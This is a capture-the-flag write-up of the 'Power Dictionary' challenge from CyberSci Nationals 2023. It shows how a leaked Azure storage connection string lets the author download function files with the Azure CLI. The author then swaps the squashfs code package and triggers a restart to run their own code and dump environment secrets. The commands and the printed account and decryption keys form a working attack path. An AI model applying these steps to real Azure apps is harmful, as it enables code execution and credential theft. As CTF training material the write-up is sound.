Power Dictionary

CTF Challenge - June 2023

Power Dictionary was a challenge from CyberSci Nationals 2023, Team Canada's qualifiers for the International Cybersecurity Challenge.

We were provided with a single HTTP endpoint ending in /app/function, which returned the following text:

Please specify a "key" url parameter

Providing a random key, let's say "foo", will result in the following:

foo has value Not a valid key - must be one of TEMPERATURE_VALUE, POWER_OUTPUT, STORAGE_OUTPUT

Naturally, we try the keys given. The first two are not particularly interesting, and don't seem to change:

TEMPERATURE_VALUE has value GOOD POWER_OUTPUT has value STABLE

STORAGE_OUTPUT gives something more interesting, although perhaps a bit unrealistic:

STORAGE_OUTPUT has value DefaultEndpointsProtocol=https;AccountName=c383e7a650712308csntl23;AccountKey=huOmzdkuw8sqC7gsHNUvw4wKDSKozhhFt2qHcxNIOoQpEIYdlOu1tUSapBpKbVft+CYGM/8A+FAY+AStLTlzig==;EndpointSuffix=core.windows.net

Searching the internet for core.windows.net gives us numerous references to Microsoft Azure, namely a List of Azure Domains. From this page, and the context mentioning storage, we infer that this is likely credentials for one of Azure's storage APIs. To interact with the Azure API, I decided to use the Azure CLI tool in the conveniently provided docker container, steps detailed in this article. Unfortunately, it seems account keys are only able to access storage in Azure, and can't be used for any other API functions, so we can't just enumerate active APIs, services, or accounts, for example.

$ docker run -it mcr.microsoft.com/azure-cli

Since it was first on the list of domains, I tunneled onto the blobs API for a while, which didn't have anything usefull for this challenge, but did confirm that the application was running on an Azure Function, Microsoft's equivalent to serverless AWS Lambda Functions, with the presence of a host.json file. Some more information in this article.

docker:/# az storage blob download -c azure-webjobs-secrets --name ntl23-maplebacon-functionapp/host.json --account-name $NAME --account-key $KEY --auth-mode key Finished[#############################################################] 100.0000% { "masterKey": { "name": "master", "value": "$ENCRYPTED DATA", "encrypted": true }, "functionKeys": [ { "name": "default", "value": "$ENCRYPTED DATA", "encrypted": true } ], "systemKeys": [], "hostName": "ntl23-maplebacon-functionapp.azurewebsites.net", "instanceId": "00000000000000000000000051B88758", "source": "runtime", "decryptionKeyId": "AzureWebEncryptionKey=UwJ5EueXM66N3xDoiQR8EdlqyHPlSa78eoSfChHyAVk=;" ...

After coming out of that rabbit hole, I realized the keys could also access the Files API. With that, I was able to list and download the files in the share associated with the account.

docker:/# az storage file download-batch -d . --source ntl23-maplebacon-functionapp-6d97 --account-name $NAME --account-key $KEY

Which gives the following filesystem:

directory listing

The filesystem seems to be files related to the deployment of the serverless function. There's a few uninteresting log files, lock/status files, but also a suspicious settings.xml, restartTrigger.txt, and a zip file. The settings.xml contains various environment variables related to the deployment, including the TEMPERATURE_VALUE, POWER_OUTPUT, and STORAGE_OUTPUT variables hardcoded, but nothing resembling the flag variable. Notably, it has WEBSITE_RUN_FROM_PACKAGE=1, which means the trick that we are about to do next is possible.

The file command tells us that 20230603165602.zip is a squashfs filesystem which we can pack and unpack with unsquashfs and mksquashfs. If you try to unzip this file, it will fail (never trust file extensions). Upon unpacking we get the following files, which turns out to be the source of the serverless function:

. └── function ├── __init__.py └── function.json
in __init__.py: import azure.functions import os def main(req: azure.functions.HttpRequest) -> str: key = req.params.get("key") if key is None: return 'Please specify a "key" url parameter' value = "Not a valid key - must be one of TEMPERATURE_VALUE, POWER_OUTPUT, STORAGE_OUTPUT" # Make sure that no one gets sensitive values like our custom NUCLEAR_CODE connection string if key in ["TEMPERATURE_VALUE", "POWER_OUTPUT", "STORAGE_OUTPUT"]: value = os.getenv(key) return f"{key} has value {value}"

Since we had WEBSITE_RUN_FROM_PACKAGE=1, the function runs directly from this code in the storage share, which means we can sideload new code just by replacing the packed squashfs with our own, then triggering a restart by overwriting restartTrigger.txt. The commands needed are:

$ unsquashfs 20230603165602.zip $ vim squashfs-root/function/__init__.py $ mksquashfs squashfs-root 20230603165602.zip $ docker run -v ./:/mnt -it mcr.microsoft.com/azure-cli docker:/# az storage file upload --share-name ntl23-maplebacon-functionapp-6d97 --path data/SitePackages/20230603165602.zip --source /mnt/20230603165602.zip --account-name $NAME --account-key $KEY docker:/# az storage file upload --share-name ntl23-maplebacon-functionapp-afc3 --path site/config/restartTrigger.txt --source /wheee/az-3/site/config/restartTrigger.txt --account-name $NAME --account-key $KEY

And just like that, we theoretically have arbitrary code execution. Unfortunately, here's where things get a bit tricky: overwriting restartTrigger.txt seems to only work once, and after that consecutive uploads of code are not loaded. The first thing I did was remove the if check on valid keys, and tried to guess the correct key without success. I couldn't find it documented anywhere until after the fact, but supposedly a custom database connection string has the CUSTOMCONNSTR_ prefix, specified in the Azure web portal, so the key I was looking for should have been CUSTOMCONNSTR_NUCLEAR_CODE. Regardless, I decided I would just print all of os.environ, but my second attempt at uploading new code wouldn't work, and would occasionally cause the function to return 500. Since this is a serverless function (Azure Function set to consumption mode), the service keeps functions loaded into memory on workers when the app is "warm", or recently frequently accessed. New code isn't reloaded until there is a cold start, and this happens non-deterministically depending on certain heuristics and usage. This is great for speed, but inordinately frustrating when trying to debug whether the payload will work. In fact, the more you get impatient and refresh the endpoint, the more you will refresh the cold start timer and increase the time you might have to wait. The only way to ensure a reload is to wait a length of time, possibly up to 30 minutes, in order for workers to be cleaned up and trigger a cold start. After that, we get this output on request:

TEMPERATURE_VALUE has value GOOD, environ(..., 'WEBSITE_DEPLOYMENT_ID': 'ntl23-maplebacon-functionapp', 'CUSTOMCONNSTR_NUCLEAR_CODE': 'f1457921c9081236e013cb92d8e5a1ee', 'TERM': 'xterm', 'WEBSITE_SITE_NAME': 'ntl23-maplebacon-functionapp', ..., 'POWER_OUTPUT': 'STABLE', 'APPSETTING_WEBSITE_SITE_NAME': 'ntl23-maplebacon-functionapp', ...})

Found a flag!